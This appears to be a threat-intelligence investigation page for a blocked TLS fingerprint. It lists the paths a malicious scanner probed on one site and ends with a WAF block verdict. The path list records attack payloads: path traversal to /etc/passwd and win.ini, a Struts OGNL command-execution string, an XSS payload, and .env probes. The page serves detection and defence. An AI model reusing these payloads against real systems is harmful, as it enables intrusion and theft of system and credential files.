Investigation Workspace

Entity: 3%7ed09afd3ffe9bdf7b (Tls)

Entity Details
Type
Tls
Linked Entities
IPs Linked to TLS Fingerprint (50)
Hostnames Targeted
Hostname Request Count
www.darcherif.fr 1928
akamai.darcherif.fr 63
Paths Targeted (with Hostname Counts)
Path Distinct Hostnames
enhancecp 2
robots.txt 2
api/.env 2
.env 2
_fragment 2
service/v1/service-details 1
../conf/config.properties 1
weaver/org.springframework.web.servlet.ResourceServlet 1
xwiki/bin/get/Main/DatabaseSearch 1
mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini 1
export/classroom-course-statistics 1
installed_emanual_down.html 1
login/cwp_theme/original/img/ico/favicon.ico 1
3695CO4Tc2Dpv4TPxnUuIGK2pEo.jsp/ 1
portal/itc/attachment_downloadByUrlAtt.action 1
etc/designs/xh1x.childrenlist.json/%3Csvg%20onload=alert%28document.domain%29%3E.html 1
netflow/jspui/j_security_check 1
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development 1
static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 1
image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd 1
premise/front/getPingData 1
js/../../../../../../../../etc/passwd%00.jpg 1
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini 1
%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action 1
modules/Rubrics/rubrics_visualise_saveAjax.php 1
.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash 1
..%5c..%5c..%5c..%5c..%5cetc/passwd 1
install/includes/configure.php 1
cgi-bin/status/status.cgi 1
+CSCOT+/oem-customization 1
CFIDE/administrator/enter.cfm 1
static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd 1
view/IPV6/naborTable/static_convert.php 1
index.php/bbs/index/download 1
api/v2/hoverfly/middleware 1
plugins/servlet/snjCustomDesignConfig 1
nuovo/spreadsheet-reader/test.php 1
Visitor/bin/WebStrings.srf 1
..%5c..%5c..%5cetc/passwd 1
wls-wsat/CoordinatorPortType 1
seeyon/thirdpartyController.do.css/..;/ajax.do 1
data/sys-common/datajson.js 1
../../../WEB-INF/web.xml;x= 1
.well-known/pki-validation/ 1
wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php 1
wp-content/plugins/wpbookit/README.txt 1
c42api/v3/LoginConfiguration 1
wp-json/buddypress/v1/signup 1
wp-content/plugins/media-library-assistant/includes/mla-stream-image.php 1
inc/jquery/uploadify/uploadify.php 1
🚫

Block

Associated with IP 134.122.136.96, which triggered multiple critical WAF deny rules including LFI, command injection, XSS, and bot impersonation. This TLS fingerprint is used by a highly malicious client.

2025-11-30 14:03:57